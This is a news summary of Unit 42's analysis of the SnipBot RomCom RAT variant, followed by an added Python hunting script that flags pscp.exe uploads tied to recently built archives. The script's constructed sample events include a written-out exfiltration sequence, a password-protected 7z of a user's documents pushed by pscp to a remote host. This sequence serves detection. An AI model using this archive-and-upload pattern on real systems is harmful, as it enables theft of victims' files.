BleepingComputer reports that organizations in the IT services, agriculture, and legal sectors have been targeted for comprehensive data exfiltration in attacks involving the novel RomCom RAT variant dubbed "SnipBot."
The intrusions began with phishing emails carrying links to malicious file downloads that ultimately installed SnipBot, according to an analysis from Palo Alto Networks Unit 42. SnipBot supports more commands than the previous RomCom RAT iteration: operators can target specific file types or directories, compress data before exfiltrating it, and deploy archive payloads that are then extracted on the host. The variant also carries stronger anti-analysis protections, including control-flow obfuscation driven by window messages, hash checks on its own executable and on the processes it creates, and other anti-sandboxing techniques. Unit 42 researchers further noted that the malware abuses the legitimate PuTTY Secure Copy client (pscp.exe) to exfiltrate data rather than relying on custom networking code. Taken together, the researchers said, the findings point to a possible shift toward cyberespionage by the malware's operators.
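As a practical follow-up to the pscp.exe finding, here is an added detection example that is not from the article or from Unit 42's report. It scores PuTTY SCP uploads seen in process-creation telemetry and ties each one back to an archive built shortly before by the same parent process, which is the "compress, then push out over SCP" pattern the summary describes. The event schema, the scoring weights, the `hunt_pscp_exfil` function name and every sample event are constructed assumptions for illustration; adapt the field names to your EDR or Sysmon schema.

```python
"""Added example (not from the article or Unit 42): hunt for pscp.exe used as an
exfiltration channel and correlate it with archive creation by the same parent.
All event data below is constructed; field names are assumptions."""
import re
import shlex
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"time": "2024-09-20T10:01:05", "image": r"C:\Users\alice\AppData\Local\Temp\7z.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "cmdline": r"7z.exe a -p -mhe=on C:\Users\alice\AppData\Local\Temp\docs.7z C:\Users\alice\Documents\*.docx"},
    {"time": "2024-09-20T10:01:40", "image": r"C:\Users\alice\AppData\Local\Temp\pscp.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "cmdline": r"pscp.exe -batch -pw Secret123 C:\Users\alice\AppData\Local\Temp\docs.7z ops@203.0.113.10:/srv/in/"},
    {"time": "2024-09-20T11:15:00", "image": r"C:\Program Files\PuTTY\pscp.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"pscp.exe -i C:\Users\bob\.ssh\key.ppk admin@build01:/var/log/app.log C:\Users\bob\logs"},
    {"time": "2024-09-20T11:16:00", "image": r"C:\Program Files\PuTTY\pscp.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"pscp.exe -i C:\Users\bob\.ssh\key.ppk C:\Users\bob\build\release.zip admin@build01:/srv/releases/"},
]

REMOTE_RE = re.compile(r"^[\w.-]+@[\w.-]+:")           # pscp remote spec: user@host:path
ARCHIVE_RE = re.compile(r"\.(zip|7z|rar|tar|gz|tgz)$", re.I)
ARCHIVERS = {"7z.exe", "7za.exe", "rar.exe", "winrar.exe"}   # all use 'a <archive> <inputs>'
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe", "windowsterminal.exe"}
PSCP_VALUE_FLAGS = {"-pw", "-pwfile", "-i", "-P", "-l", "-hostkey", "-proxycmd", "-loghost", "-sshlog", "-sshrawlog"}
EXPECTED_PSCP_DIR = r"c:\program files\putty"          # assumed standard install location
CORRELATION_WINDOW = timedelta(minutes=10)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_pscp(cmdline):
    """Split a pscp command line into option flags and positional source/destination args."""
    tokens = shlex.split(cmdline, posix=False)[1:]    # posix=False keeps Windows backslashes intact
    flags, args, it = {}, [], iter(tokens)
    for tok in it:
        if tok.startswith("-"):
            flags[tok] = next(it, None) if tok in PSCP_VALUE_FLAGS else True
        else:
            args.append(tok)
    return flags, args


def archive_created(ev):
    """For 7-Zip/RAR style 'a <archive> <inputs>' invocations, return the archive path (lowercased)."""
    if basename(ev["image"]) not in ARCHIVERS:
        return None
    tokens = shlex.split(ev["cmdline"], posix=False)[1:]
    if "a" not in tokens:
        return None
    for tok in tokens[tokens.index("a") + 1:]:
        if not tok.startswith("-"):                   # first non-switch after 'a' is the archive
            return tok.lower()
    return None


@dataclass
class Finding:
    time: str
    parent: str
    remote: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points, why):
        self.score += points
        self.reasons.append(why)


def hunt_pscp_exfil(events):
    """Score every pscp upload by how much it resembles tooling-driven exfiltration."""
    recent_archives, findings = [], []                # (time, parent image, archive path)
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        arch = archive_created(ev)
        if arch:
            recent_archives.append((t, ev["parent"].lower(), arch))
            continue
        if basename(ev["image"]) != "pscp.exe":
            continue
        flags, args = parse_pscp(ev["cmdline"])
        if len(args) < 2 or not REMOTE_RE.match(args[-1]):
            continue                                  # download or local copy, not an upload
        f = Finding(ev["time"], basename(ev["parent"]), args[-1])
        f.add(1, "pscp upload to remote host")
        if f.parent not in INTERACTIVE_PARENTS:
            f.add(3, f"launched by non-interactive parent {f.parent}")
        if not ev["image"].lower().startswith(EXPECTED_PSCP_DIR):
            f.add(2, "pscp.exe running outside its expected install directory")
        if "-pw" in flags:
            f.add(2, "password on the command line (scripted, unattended use)")
        sources = [a.lower() for a in args[:-1]]
        if any(ARCHIVE_RE.search(s) for s in sources):
            f.add(1, "uploading an archive")
        for at, aparent, apath in recent_archives:
            if aparent == ev["parent"].lower() and apath in sources and t - at <= CORRELATION_WINDOW:
                f.add(3, f"same parent built {apath} {int((t - at).total_seconds())}s earlier")
                break
        findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in hunt_pscp_exfil(SAMPLE_EVENTS):
        if finding.score >= 5:
            print(finding.time, finding.score, finding.remote, "; ".join(finding.reasons))
```

Two caveats worth stating: pscp also accepts a bare `host:path` destination, which the regex above deliberately ignores because it is indistinguishable from a Windows drive letter without further context, and a dropped copy of pscp.exe may be renamed, so in production match on the binary's OriginalFileName or file hash rather than on the image name alone.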